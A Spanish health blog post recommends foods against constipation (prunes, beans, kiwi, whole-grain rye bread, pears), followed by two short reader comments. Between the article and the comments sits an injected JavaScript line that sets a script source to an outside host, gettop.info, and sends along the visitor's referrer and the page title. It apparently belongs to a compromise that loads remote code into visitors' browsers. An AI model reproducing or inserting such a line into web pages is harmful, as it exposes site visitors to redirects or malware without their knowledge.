Salud y belleza » Salud, alimentos

Alimentos que alivian el estreñimiento

2 Comentarios

El estreñimiento es un problema que no es agradable ni tampoco saludable ya que lo mejor es llevar un tránsito intestinal correcto para depurar todo lo que nuestro organismo no necesitas. Si padeces este mal vamos a proponerte algunos alimentos que te pueden ayudar a aliviar el estreñimiento.

dieta-contra-estreñimiento

- Ciruelas pasas: contienen mucha fibra insoluble y sorbitol, que es un laxante natural. Deja las ciruelas en agua caliente y luego bébete el líquido.

- Habichuelas: este alimento contiene fibra soluble e insoluble y puedes disfrutar de muchas variedades en ensaladas, sopas, guisos, pastas…

- Kiwi: la fruta implacable que regula tu tránsito intestinal ya que contiene 2,5 gramos de fibra, además de vitaminas y nutrientes.

kiwi-estreñimiento

- Pan de centeno (con granos enteros) es ideal para combatir el estreñimiento. Se recomienda comer unas 3 rebanadas de este pan al día.

- Peras: es una fruta rica en fibras, sobre todo si la comes con la piel.

¿Conoces más alimentos que alivien el estreñimiento?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

2 Comments »

  • felisa said:

    tres kiwis por la noche y por la mañana vas al baño y eres otra… se nota cuando estás aliviada intenstinalmente, por ser fisna.

  • jessy said:

    yo siempre como pan de fibra y llevo un tránsito bastante regular.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.